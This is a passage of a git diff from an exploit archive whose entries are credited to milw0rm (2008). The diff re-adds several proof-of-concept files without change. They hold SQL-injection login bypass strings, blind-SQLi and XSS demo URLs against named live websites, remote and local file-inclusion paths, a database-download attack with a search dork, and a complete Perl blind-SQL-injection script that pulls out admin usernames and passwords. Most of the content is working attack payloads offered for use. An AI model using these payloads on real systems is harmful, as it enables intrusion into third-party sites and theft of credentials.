+http://localhost/script/[pie installation]/lib/action/rss.php?lib=ZoRLu.txt?
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & RedHaK
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7227.txt b/platforms/php/webapps/7227.txt
index f72574fa1..ea98d534a 100755
--- a/platforms/php/webapps/7227.txt
+++ b/platforms/php/webapps/7227.txt
@@ -1,48 +1,48 @@
-[~] Chipmunk Topsites (Auth Bypass) SQL Injection & XSS Multiple Remote Vuln.
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: RedHaK Kardesime ozel tesekurler.
-[~] -----------------------------------------------------------
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1
-
-password: ZoRLu ( or dont write anything )
-
-note: generally admin name: admin
-
-
-exploit for demo:
-
-http://www.chipmunk-scripts.com/topsites/login.php
-
-username: admin ' or ' 1=1--
-
-passwd: ZoRLu ( or dont write anything )
-
-or
-
-username: zorlu ' or ' 1=1--
-
-passwd: ZoRLu ( or dont write anything )
-
-
-XSS:
-
-http://www.arcade-classics.net/top100/index.php?start="><script>alert()</script>
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & RedHaK
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-25]
+[~] Chipmunk Topsites (Auth Bypass) SQL Injection & XSS Multiple Remote Vuln.
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: RedHaK Kardesime ozel tesekurler.
+[~] -----------------------------------------------------------
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1
+
+password: ZoRLu ( or dont write anything )
+
+note: generally admin name: admin
+
+
+exploit for demo:
+
+http://www.chipmunk-scripts.com/topsites/login.php
+
+username: admin ' or ' 1=1--
+
+passwd: ZoRLu ( or dont write anything )
+
+or
+
+username: zorlu ' or ' 1=1--
+
+passwd: ZoRLu ( or dont write anything )
+
+
+XSS:
+
+http://www.arcade-classics.net/top100/index.php?start="><script>alert()</script>
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & RedHaK
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7228.txt b/platforms/php/webapps/7228.txt
index 08b94285d..8effbff48 100755
--- a/platforms/php/webapps/7228.txt
+++ b/platforms/php/webapps/7228.txt
@@ -1,33 +1,33 @@
-[~] Clean CMS 1.5 Blind Sql & XSS Multiple Remote Vuln.
-[~]
-[~] script: http://www.4yoursite.nl/script_clean_cms.php
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: RedHaK Kardesime ozel tesekurler.
-[~] -----------------------------------------------------------
-
-exp for demo:
-
-http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )
-
-http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )
-
-XSS for demo:
-
-http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id="><script>alert()</script>
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & RedHaK
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-25]
+[~] Clean CMS 1.5 Blind Sql & XSS Multiple Remote Vuln.
+[~]
+[~] script: http://www.4yoursite.nl/script_clean_cms.php
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: RedHaK Kardesime ozel tesekurler.
+[~] -----------------------------------------------------------
+
+exp for demo:
+
+http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )
+
+http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )
+
+XSS for demo:
+
+http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id="><script>alert()</script>
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & RedHaK
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7229.txt b/platforms/php/webapps/7229.txt
index 515942eec..f13ced3f8 100755
--- a/platforms/php/webapps/7229.txt
+++ b/platforms/php/webapps/7229.txt
@@ -1,31 +1,31 @@
-[~] FAQ Manager 1.2 Remote File injulide : ) )
-[~]
-[~] download: http://www.4yoursite.nl/downloads/faq_man_1.2.zip
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: RedHaK Kardesime ozel tesekurler.
-[~] -----------------------------------------------------------
-
-file:
-
-include/header.php
-
-exp:
-
-http://localhost/script/include/header.php?config_path=ZoRLu.txt?
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & RedHaK
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-25]
+[~] FAQ Manager 1.2 Remote File injulide : ) )
+[~]
+[~] download: http://www.4yoursite.nl/downloads/faq_man_1.2.zip
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: RedHaK Kardesime ozel tesekurler.
+[~] -----------------------------------------------------------
+
+file:
+
+include/header.php
+
+exp:
+
+http://localhost/script/include/header.php?config_path=ZoRLu.txt?
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & RedHaK
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7230.pl b/platforms/php/webapps/7230.pl
index af181906e..a40d305c1 100755
--- a/platforms/php/webapps/7230.pl
+++ b/platforms/php/webapps/7230.pl
@@ -1,199 +1,199 @@ -# Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit -# url: http://www.4yoursite.nl/script_clean_cms.php -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://hack0wn.com && spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. -# -# Hack0wn :D - -my $MAX_FIELD_LENGTH = 200 ; -my $EXIT_IF_NO_CHAR = 1 ; -my $DEFAULT_THREADS = 15 ; -my $DEFAULT_THREADS_TIMEOUT = 30 ; -my @ascii = ( 32 .. 123 ) ; -my $DEFAULT_THREADS_TIME = 1 ; - - -use LWP::UserAgent ; - -sub _HELP_AND_EXIT -{ - die " - - ./$0 -u <url> -p <pattern> - - Options: - -u <url> Ex: http://localhost/full_txt.php?id=19 - -p <pattern> HTML pattern. - - Other: - -t <#> Threads, default '$DEFAULT_THREADS'. - -l <#> Maximum table name length '$MAX_FIELD_LENGTH'. - -T <#> Timeout. - -h Help (also with --help). - - Example: - - ./$0 -u \"http://localhost/full_txt.php?id=19\" -p Concurso - -" ; -} - - - my ($p, $w) = ({ @ARGV }, { }) ; - - map { - &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ; - } keys %$p ; - - map { - die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ; - } qw/-u -p/ ; - - $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ; - $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ; - $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ; - - map { - warn "[i] Getting default: $_ $w->{ $_ }\n" ; - } sort keys %$w ; - - ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? 
Isn't vulnerable ?\n" ; - - - - -sub _START_WORK -{ - my $p = shift ; - - my $position = 1 ; - - pipe(R, W) ; - pipe(Rs, Ws) ; - autoflush STDOUT 1 ; - - my $sql_message = '' ; - my $msg = '' ; - my @pid ; - - while( $position <= $p->{'-l'} ) - { - my $cf ; - unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; } - push(@pid, $cf) ; - - my $count = 0 ; - my $can_exit ; - my $char_printed ; - - while(<R>) - { - chomp ; - push(@pid, (split(/:/))[1] ) if /^pid/ ; - - my ($res, $pos, $ascii) = ( split(/ /, $_) ) ; - $count++ if $pos == $position ; - - print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ; - - if( $res eq 'yes' and $pos == $position ){ - $char_printed = $can_exit = 1 ; - print Ws "STOP $position\n" ; - $sql_message .= chr( $ascii ) ; - } - - last if ( $can_exit or $count == @ascii ); - } - - map { waitpid($_, 0) } @pid ; - - unless( $char_printed ) - { - if( $EXIT_IF_NO_CHAR ) - { - warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ; - last ; - } - } - - $position++ ; - } - - print "[i] USER / PASSWORD:\n$sql_message\n" ; - -} - -sub _CHECKING -{ - my ($p, $position) = @_ ; - my $counter = 0 ; - my $stop_position ; - - foreach my $ascii ( @ascii ) - { - $counter++ ; - - if( $counter % $p->{'-t'} == 0 ) - { - my $stop_position ; - eval - { - $SIG{'ALRM'} = sub { die "non_stop\n" } ; - alarm $DEFAULT_THREADS_TIME ; - my $line = <Rs> ; - $stop_position = (split( / /, $line))[1] ; - alarm 0 ; - } ; - - if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; } - } - - unless(my $pid = fork ) - { - print Ws "pid:$pid\n" or die ; - - - my $url = $p->{'-u'} . - ' AND ascii(substring((SELECT CONCAT(admin_name,0x202f20,admin_pass) FROM config LIMIT 0,1),' . $position . ',1))='. 
$ascii ; - - my $ua = LWP::UserAgent->new ; - $ua->timeout( $p->{'-T'} ) ; - - my $content ; - while( 1 ) - { - last if $content = $ua->get( $url )->content ; - } - - ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ; - - exit( 0 ) ; - } - - } -} - - - -sub _IS_VULN -{ - my $p = shift ; - - my $ua = LWP::UserAgent->new ; - $ua->timeout( $p->{'-T'} ) ; - - my ( $one, $two ) = ( - $ua->get( $p->{'-u'}." AND 1=1")->content , - $ua->get( $p->{'-u'}." AND 1=2")->content , - ) ; - - return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ; -} - -# milw0rm.com [2008-11-25] +# Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit +# url: http://www.4yoursite.nl/script_clean_cms.php +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://hack0wn.com && spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# Hack0wn :D + +my $MAX_FIELD_LENGTH = 200 ; +my $EXIT_IF_NO_CHAR = 1 ; +my $DEFAULT_THREADS = 15 ; +my $DEFAULT_THREADS_TIMEOUT = 30 ; +my @ascii = ( 32 .. 123 ) ; +my $DEFAULT_THREADS_TIME = 1 ; + + +use LWP::UserAgent ; + +sub _HELP_AND_EXIT +{ + die " + + ./$0 -u <url> -p <pattern> + + Options: + -u <url> Ex: http://localhost/full_txt.php?id=19 + -p <pattern> HTML pattern. + + Other: + -t <#> Threads, default '$DEFAULT_THREADS'. + -l <#> Maximum table name length '$MAX_FIELD_LENGTH'. + -T <#> Timeout. + -h Help (also with --help). + + Example: + + ./$0 -u \"http://localhost/full_txt.php?id=19\" -p Concurso + +" ; +} + + + my ($p, $w) = ({ @ARGV }, { }) ; + + map { + &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ; + } keys %$p ; + + map { + die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ; + } qw/-u -p/ ; + + $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? 
$p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ; + $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ; + $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ; + + map { + warn "[i] Getting default: $_ $w->{ $_ }\n" ; + } sort keys %$w ; + + ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ; + + + + +sub _START_WORK +{ + my $p = shift ; + + my $position = 1 ; + + pipe(R, W) ; + pipe(Rs, Ws) ; + autoflush STDOUT 1 ; + + my $sql_message = '' ; + my $msg = '' ; + my @pid ; + + while( $position <= $p->{'-l'} ) + { + my $cf ; + unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; } + push(@pid, $cf) ; + + my $count = 0 ; + my $can_exit ; + my $char_printed ; + + while(<R>) + { + chomp ; + push(@pid, (split(/:/))[1] ) if /^pid/ ; + + my ($res, $pos, $ascii) = ( split(/ /, $_) ) ; + $count++ if $pos == $position ; + + print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ; + + if( $res eq 'yes' and $pos == $position ){ + $char_printed = $can_exit = 1 ; + print Ws "STOP $position\n" ; + $sql_message .= chr( $ascii ) ; + } + + last if ( $can_exit or $count == @ascii ); + } + + map { waitpid($_, 0) } @pid ; + + unless( $char_printed ) + { + if( $EXIT_IF_NO_CHAR ) + { + warn "\n[!] 
\$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ; + last ; + } + } + + $position++ ; + } + + print "[i] USER / PASSWORD:\n$sql_message\n" ; + +} + +sub _CHECKING +{ + my ($p, $position) = @_ ; + my $counter = 0 ; + my $stop_position ; + + foreach my $ascii ( @ascii ) + { + $counter++ ; + + if( $counter % $p->{'-t'} == 0 ) + { + my $stop_position ; + eval + { + $SIG{'ALRM'} = sub { die "non_stop\n" } ; + alarm $DEFAULT_THREADS_TIME ; + my $line = <Rs> ; + $stop_position = (split( / /, $line))[1] ; + alarm 0 ; + } ; + + if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; } + } + + unless(my $pid = fork ) + { + print Ws "pid:$pid\n" or die ; + + + my $url = $p->{'-u'} . + ' AND ascii(substring((SELECT CONCAT(admin_name,0x202f20,admin_pass) FROM config LIMIT 0,1),' . $position . ',1))='. $ascii ; + + my $ua = LWP::UserAgent->new ; + $ua->timeout( $p->{'-T'} ) ; + + my $content ; + while( 1 ) + { + last if $content = $ua->get( $url )->content ; + } + + ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ; + + exit( 0 ) ; + } + + } +} + + + +sub _IS_VULN +{ + my $p = shift ; + + my $ua = LWP::UserAgent->new ; + $ua->timeout( $p->{'-T'} ) ; + + my ( $one, $two ) = ( + $ua->get( $p->{'-u'}." AND 1=1")->content , + $ua->get( $p->{'-u'}." AND 1=2")->content , + ) ; + + return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ; +} + +# milw0rm.com [2008-11-25] diff --git a/platforms/php/webapps/7231.txt b/platforms/php/webapps/7231.txt index 60ae56856..b65efeadc 100755 --- a/platforms/php/webapps/7231.txt +++ b/platforms/php/webapps/7231.txt 
@@ -1,38 +1,38 @@
-/*
---+_---=+--=_____=+++++
-
--- FuzzyLime 3.03 Local File Iclude PoC
- ***
- (-0-)
- -____======_+++++---''''
-***************************************__________________
--- Vuln
- - code/track.php
-
- $m = $_GET[m];
- $p = $_GET[p]; //1
- include "settings.inc.php";
- if(!isset($_POST[url]) || !isset($_POST[title]) || !isset($_POST[excerpt])) { //2
- header("Location: ${rooturl}index.php?s=news&p=$p&m=$m");
- }
- else {
- if(file_exists("../blogs/$p.inc.php")) { //3
- include "../blogs/$p.inc.php"; //4
- ...
-1 $p is not filtered
-2 When POST'S is set
-3 and file exists
-4 we have lfi
-
----+++++....--___________--============
-*/
-
-
-Go to LIVE_HTTP_HEADERS in firefox or opera or whatever
-set url http://site/path/code/track.php?p=[file]
-set "SEND POST CONNTENT" url=evil&title=666&excerpt=xd
-and push reply
-
-//Alfons Luja 25.12.2008
-
-# milw0rm.com [2008-11-25]
+/*
+--+_---=+--=_____=+++++
+
+-- FuzzyLime 3.03 Local File Iclude PoC
+ ***
+ (-0-)
+ -____======_+++++---''''
+***************************************__________________
+-- Vuln
+ - code/track.php
+
+ $m = $_GET[m];
+ $p = $_GET[p]; //1
+ include "settings.inc.php";
+ if(!isset($_POST[url]) || !isset($_POST[title]) || !isset($_POST[excerpt])) { //2
+ header("Location: ${rooturl}index.php?s=news&p=$p&m=$m");
+ }
+ else {
+ if(file_exists("../blogs/$p.inc.php")) { //3
+ include "../blogs/$p.inc.php"; //4
+ ...
+1 $p is not filtered
+2 When POST'S is set
+3 and file exists
+4 we have lfi
+
+---+++++....--___________--============
+*/
+
+
+Go to LIVE_HTTP_HEADERS in firefox or opera or whatever
+set url http://site/path/code/track.php?p=[file]
+set "SEND POST CONNTENT" url=evil&title=666&excerpt=xd
+and push reply
+
+//Alfons Luja 25.12.2008
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7232.txt b/platforms/php/webapps/7232.txt
index 1532de097..a2207b428 100755
--- a/platforms/php/webapps/7232.txt
+++ b/platforms/php/webapps/7232.txt
@@ -1,43 +1,43 @@ -[»] SimpleBlog 3.0 Mdb Vulnerability -[»] -[»] ---------------------------------------------------------- -[»] Author : EL_MuHaMMeD -[»] -[»] Date : 26.11.2008 -[»] -[»] Contact : cwelmuhammed@gmail.com -[»] -[»] ----------------------------------------------------------- - - -Script : SimpleBlog 3.0 - -Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar - -Dork : "inurl:simpleblog3" - -Our mdb path : db/simpleBlog.mdb - -Exploits : - -Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb - -Step 2 - Download that mdb file and read admin name & pass from "users" table. - -Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp - -Example : - -http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb - -http://www.bvrg.org.uk/simpleblog3/admin/default.asp - - - -[»] ---------------------------------------------------------------------- -[»] -[»] Cyber-Security.ORG - ELMuHaMMeD.COM -[»] -[»] ---------------------------------------------------------------------- - -# milw0rm.com [2008-11-25] +[»] SimpleBlog 3.0 Mdb Vulnerability +[»] +[»] ---------------------------------------------------------- +[»] Author : EL_MuHaMMeD +[»] +[»] Date : 26.11.2008 +[»] +[»] Contact : cwelmuhammed@gmail.com +[»] +[»] ----------------------------------------------------------- + + +Script : SimpleBlog 3.0 + +Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar + +Dork : "inurl:simpleblog3" + +Our mdb path : db/simpleBlog.mdb + +Exploits : + +Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb + +Step 2 - Download that mdb file and read admin name & pass from "users" table. 
+ +Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp + +Example : + +http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb + +http://www.bvrg.org.uk/simpleblog3/admin/default.asp + + + +[»] ---------------------------------------------------------------------- +[»] +[»] Cyber-Security.ORG - ELMuHaMMeD.COM +[»] +[»] ---------------------------------------------------------------------- + +# milw0rm.com [2008-11-25] diff --git a/platforms/php/webapps/7234.txt b/platforms/php/webapps/7234.txt index 9af8bce2d..723212efa 100755 --- a/platforms/php/webapps/7234.txt +++ b/platforms/php/webapps/7234.txt 
@@ -1,61 +1,61 @@ -*********************************************************************************************************************************************************** -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!] O O O O O [!] -[!] O O O [!] -[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!] O OOO OOO O O O O OO O O O O OO O O O [!] -[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!] O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO WwW.Exploiter5.CoM ; WwW.No-Exploit.CoM ; WwW.IQ-TY.CoM [!] -*********************************************************************************************************************************************************** -+---- Bismi Allah Irahmani ArraHim ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [ Video Girls (type) Blind SQL Injection Vulnerability ] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: Author : Cyber-Zone ( Abdelkhalek) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ -¦ From : MoroCCo ¦ ¦ ¦ -¦ Script : http://www.videogirls.biz ¦ ¦ ![ 4 ]! 
¦ -¦ Download : http://www.videogirls.biz/view.php?p=Invest ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ -¦ ¦ - -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ - - -ExploiT : - - - -http://www.videogirls.biz/demo/view_snaps.php?type=2+and+substring(@@version,1,1)=5 ===> False - -http://www.videogirls.biz/demo/view_snaps.php?type=2+and+substring(@@version,1,1)=4 ===> True - - -Spicail ( R07 T9awwad ) To str0ke & Milw0rM - -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -+---- ThanX To ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -= [AttaCk Is CompLet] = 
-___________________________________________________________________________________________________________________________________________________________ - -# milw0rm.com [2008-11-25] +*********************************************************************************************************************************************************** +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!] O O O O O [!] +[!] O O O [!] +[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!] O OOO OOO O O O O OO O O O O OO O O O [!] +[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!] O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO WwW.Exploiter5.CoM ; WwW.No-Exploit.CoM ; WwW.IQ-TY.CoM [!] +*********************************************************************************************************************************************************** ++---- Bismi Allah Irahmani ArraHim ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [ Video Girls (type) Blind SQL Injection Vulnerability ] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: Author : Cyber-Zone ( Abdelkhalek) : : : +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ From : MoroCCo ¦ ¦ ¦ +¦ Script : http://www.videogirls.biz ¦ ¦ ![ 4 ]! 
¦ +¦ Download : http://www.videogirls.biz/view.php?p=Invest ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: : +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ + +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ + + +ExploiT : + + + +http://www.videogirls.biz/demo/view_snaps.php?type=2+and+substring(@@version,1,1)=5 ===> False + +http://www.videogirls.biz/demo/view_snaps.php?type=2+and+substring(@@version,1,1)=4 ===> True + + +Spicail ( R07 T9awwad ) To str0ke & Milw0rM + ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ ++---- ThanX To ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ += [AttaCk Is CompLet] = 
+___________________________________________________________________________________________________________________________________________________________ + +# milw0rm.com [2008-11-25] diff --git a/platforms/php/webapps/7235.txt b/platforms/php/webapps/7235.txt index a4aaf432f..d61fa94e4 100755 --- a/platforms/php/webapps/7235.txt +++ b/platforms/php/webapps/7235.txt @@ -1,33 +1,33 @@ -[â– ] Jamit Job Board v.3 (index.php show_emp) <= Blind $ql Injection - - ->☻< - -> AuToR: XaDoS -> Contact M&: xados [at] hotmail [dot] it -> Site: www.securitycode.it -> B§g: Blind $ql inJection -> SIte vuln: http://www.jamit.com - ->☻< - - -[â– ] ExPL0iT: - -|: http://www.example.com/index.php?show_emp=[sql] - - -[â– ] D£M0: - -|: http://www.jamit.com/jobs/index.php?show_emp=1%20and%20substring(@@version,1,1)=4 [NO°°] - -|: http://www.jamit.com/jobs/index.php?show_emp=1%20and%20substring(@@version,1,1)=5 [y&$] - -(l00k at the end of the PaG&) - - -[â– ] Th4nKs:::::> - -\> Str0ke </\> Thc(MarJuana) </\> WiLLiam S. Burroughs </\> LiLiTh (You Ar& Mi!nE!) </ - -# milw0rm.com [2008-11-25] +[â– ] Jamit Job Board v.3 (index.php show_emp) <= Blind $ql Injection + + +>☻< + +> AuToR: XaDoS +> Contact M&: xados [at] hotmail [dot] it +> Site: www.securitycode.it +> B§g: Blind $ql inJection +> SIte vuln: http://www.jamit.com + +>☻< + + +[â– ] ExPL0iT: + +|: http://www.example.com/index.php?show_emp=[sql] + + +[â– ] D£M0: + +|: http://www.jamit.com/jobs/index.php?show_emp=1%20and%20substring(@@version,1,1)=4 [NO°°] + +|: http://www.jamit.com/jobs/index.php?show_emp=1%20and%20substring(@@version,1,1)=5 [y&$] + +(l00k at the end of the PaG&) + + +[â– ] Th4nKs:::::> + +\> Str0ke </\> Thc(MarJuana) </\> WiLLiam S. Burroughs </\> LiLiTh (You Ar& Mi!nE!) </ + +# milw0rm.com [2008-11-25] diff --git a/platforms/php/webapps/7237.txt b/platforms/php/webapps/7237.txt index f8f8b4d57..9c30a14b2 100755 --- a/platforms/php/webapps/7237.txt +++ b/platforms/php/webapps/7237.txt 
